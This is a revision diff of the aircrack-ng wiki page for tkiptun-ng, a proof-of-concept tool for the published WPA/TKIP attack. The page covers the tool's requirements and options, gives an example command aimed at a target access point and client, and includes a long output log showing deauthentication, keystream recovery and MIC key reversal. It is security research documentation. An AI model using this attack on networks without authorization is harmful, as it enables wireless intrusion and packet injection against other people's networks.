User Tools

Site Tools


tkiptun-ng

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision
Previous revision
Last revisionBoth sides next revision
tkiptun-ng [2008/11/06 20:23] – created mister_xtkiptun-ng [2009/09/26 20:41] – Fiex typos darkaudax
Line 1: Line 1:
-====== tkiptun-ng ======+====== Tkiptun-ng ======
  
 ===== Description ===== ===== Description =====
  
-It is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames in a WPA TKIP network with QoS.+NOTE: This documentation is still under development.  Please check back on a regular basis to obtain the latest updates.  If you have any feedback on the documentation, please post your comments to the [[http://forum.aircrack-ng.org|Forum]]. 
 + 
 +**IMPORTANT NOTE:** The tkiptun-ng SVN version is not fully working.  The final attack phase is not yet implemented.  The other portions are working with the ieee80211 drivers for RT73 and RTL8187L chipsets.  The madwifi-ng driver is definitely broken and is known to completely fail.  tkiptun-ng may work with other drivers but has not been tested so your mileage may vary. 
 + 
 +Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA"
 + 
 +Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack.  This attack is described in the paper, [[http://dl.aircrack-ng.org/breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://arstechnica.com/security/news/2008/11/wpa-cracked.ars/|Battered, but not broken: understanding the WPA crack]] by Glenn Fleishman. 
 + 
 +Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check).  This is done via [[chopchoptheory|chopchop]]-type method.  Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated. 
 + 
 +At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication.  Subsequently, using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools. 
 + 
 +[[http://download.aircrack-ng.org/wiki-files/doc/tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009 provides an excellent detailed description of how tkiptun-ng works.  As well, their paper includes detailed descriptions of many other attacks against WEP/WPA/WPA2. 
 + 
 +Please remember this is an extremely advanced attack.  You must possess advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills.  Novices will NOT BE SUPPORTED. 
 + 
 + 
 +===== General Requirements ===== 
 + 
 +Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs. 
 + 
 +The AP must be configured for WPA plus TKIP. 
 + 
 +A fairly long rekeying time must be in use such as 3600 seconds.  It should be at least 20 minutes. 
 + 
 + 
 +===== Specific Requirements ===== 
 + 
 +The network card MAC address used by tkiptun-ng needs to be set to the MAC address of the client you are attacking. 
 + 
 + 
 + 
 +===== Why? ===== 
 + 
 +This section is very preliminary.  As tkiptun-ng works, it goes through various phases.  People ask "Why is such and such done?" This section attempts to answer those questions. 
 + 
 +**Question:** \\ 
 +Why is the handshake gathered? 
 + 
 +**Answer:** \\ 
 +It is done for debugging reasons.  First, so  that the temporal keys in tkiptun can be calculated.  Second, check them against the calculated values from the plaintext packet. 
 + 
 +Another reason, is to check if the AP/client reuses the nonces after a mic shutdown. 
 + 
 + 
 +===== Usage ===== 
 + 
 +Usage: tkiptun-ng <options> <replay interface> 
 + 
 +Filter options: 
 + 
 +  * -d dmac   : MAC address, Destination 
 +  * -s smac   : MAC address, Source 
 +  *  -m len    : minimum packet length 
 +  *  -n len    : maximum packet length 
 +  * -t tods   : frame control, To      DS bit 
 +  * -f fromds : frame control, From    DS bit 
 +  * -D        : disable AP detection 
 + 
 +Replay options: 
 + 
 +  * -x nbpps  : number of packets per second 
 +  * -a bssid  : set Access Point MAC address 
 +  * -c dmac   : set Destination  MAC address 
 +  * -h smac   : set Source       MAC address 
 +  * -F        : choose first matching packet 
 +  * -e essid  : set target AP SSID 
 + 
 +Debug options: 
 + 
 +  * -K prga   : keystream for continuation 
 +  * -y file   : keystream-file for continuation 
 +  * -j        : inject FromDS packets 
 +  * -P pmk    : pmk for verification/vuln testing 
 +  * -p psk    : psk to calculate pmk with essid 
 + 
 +Source options: 
 + 
 +  * -i iface  : capture packets from this interface 
 +  * -r file   : extract packets from this pcap file 
 +\\ 
 +  *-''''-help              : Displays this usage screen 
 + 
 + 
 +===== Usage Examples ===== 
 + 
 +The example below is incomplete but it gives some idea of how it looks. 
 + 
 +Input: 
 + 
 +   tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0  
 + 
 +Output: 
 + 
 +   The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC (-h). 
 +        ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D 
 +   Blub 2:38 E6 38 1C 24 15 1C CF  
 +   Blub 1:17 DD 0D 69 1D C3 1F EE  
 +   Blub 3:29 31 79 E7 E6 CF 8D 5E  
 +   15:06:48  Michael Test: Successful 
 +   15:06:48  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 
 +   15:06:48  Found specified AP 
 +   15:06:48  Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] 
 +   15:06:54  Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] 
 +   15:06:56  WPA handshake: 00:14:6C:7E:40:80 captured 
 +   15:06:56  Waiting for an ARP packet coming from the Client... 
 +   Saving chosen packet in replay_src-0305-150705.cap 
 +   15:07:05  Waiting for an ARP response packet coming from the AP... 
 +   Saving chosen packet in replay_src-0305-150705.cap 
 +   15:07:05  Got the answer! 
 +   15:07:05  Waiting 10 seconds to let encrypted EAPOL frames pass without interfering. 
 +    
 +   15:07:25  Offset   99 ( 0% done) | xor = B3 | pt = D3 |  103 frames written in 84468ms 
 +   15:08:32  Offset   98 ( 1% done) | xor = AE | pt = 80 |   64 frames written in 52489ms 
 +   15:09:45  Offset   97 ( 3% done) | xor = DE | pt = C8 |  131 frames written in 107407ms 
 +   15:11:05  Offset   96 ( 5% done) | xor = 5A | pt = 7A |  191 frames written in 156619ms 
 +   15:12:07  Offset   95 ( 6% done) | xor = 27 | pt = 02 |   21 frames written in 17221ms 
 +   15:13:11  Offset   94 ( 8% done) | xor = D8 | pt = AB |   41 frames written in 33625ms 
 +   15:14:12  Offset   93 (10% done) | xor = 94 | pt = 62 |   13 frames written in 10666ms 
 +   15:15:24  Offset   92 (11% done) | xor = DF | pt = 68 |  112 frames written in 91829ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:18:13  Offset   91 (13% done) | xor = A1 | pt = E1 |  477 frames written in 391139ms 
 +   15:19:32  Offset   90 (15% done) | xor = 5F | pt = B2 |  186 frames written in 152520ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:22:09  Offset   89 (16% done) | xor = 9C | pt = 77 |  360 frames written in 295200ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:26:10  Offset   88 (18% done) | xor = 0D | pt = 3E |  598 frames written in 490361ms 
 +   15:27:33  Offset   87 (20% done) | xor = 8C | pt = 00 |  230 frames written in 188603ms 
 +   15:28:38  Offset   86 (21% done) | xor = 67 | pt = 00 |   47 frames written in 38537ms 
 +   15:29:53  Offset   85 (23% done) | xor = AD | pt = 00 |  146 frames written in 119720ms 
 +   15:31:16  Offset   84 (25% done) | xor = A3 | pt = 00 |  220 frames written in 180401ms 
 +   15:32:23  Offset   83 (26% done) | xor = 28 | pt = 00 |   75 frames written in 61499ms 
 +   15:33:38  Offset   82 (28% done) | xor = 7C | pt = 00 |  141 frames written in 115619ms 
 +   15:34:40  Offset   81 (30% done) | xor = 02 | pt = 00 |   19 frames written in 15584ms 
 +   15:35:57  Offset   80 (31% done) | xor = C9 | pt = 00 |  171 frames written in 140221ms 
 +   15:37:13  Offset   79 (33% done) | xor = 38 | pt = 00 |  148 frames written in 121364ms 
 +   15:38:21  Offset   78 (35% done) | xor = 71 | pt = 00 |   84 frames written in 68872ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:40:55  Offset   77 (36% done) | xor = 8E | pt = 00 |  328 frames written in 268974ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:43:31  Offset   76 (38% done) | xor = 38 | pt = 00 |  355 frames written in 291086ms 
 +   15:44:37  Offset   75 (40% done) | xor = 79 | pt = 00 |   61 frames written in 50021ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:47:05  Offset   74 (41% done) | xor = 59 | pt = 00 |  269 frames written in 220581ms 
 +   15:48:30  Offset   73 (43% done) | xor = 14 | pt = 00 |  249 frames written in 204178ms 
 +   15:49:49  Offset   72 (45% done) | xor = 9A | pt = 00 |  183 frames written in 150059ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:52:32  Offset   71 (46% done) | xor = 03 | pt = 00 |  420 frames written in 344400ms 
 +   15:53:57  Offset   70 (48% done) | xor = 0E | pt = 00 |  239 frames written in 195980ms 
 +   Sleeping for 60 seconds.36 bytes still unknown 
 +   ARP Reply 
 +   Checking 192.168.x.y 
 +   15:54:11  Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66 
 +    
 +   Saving plaintext in replay_dec-0305-155411.cap 
 +   Saving keystream in replay_dec-0305-155411.xor 
 +   15:54:11   
 +   Completed in 2816s (0.02 bytes/s) 
 +    
 +   15:54:11  AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42 
 +   15:54:11  Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112 
 +   15:54:11  Sent encrypted tkip ARP request to the client. 
 +   15:54:11  Wait for the mic countermeasure timeout of 60 seconds. 
 + 
 + 
 +===== Usage Tips ===== 
 + 
 +None at this time. 
 + 
 +===== Usage Troubleshooting ===== 
 + 
 +None at this time. 
  
-He worked a few weeks ago with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". 
tkiptun-ng.txt · Last modified: 2009/09/27 16:01 by darkaudax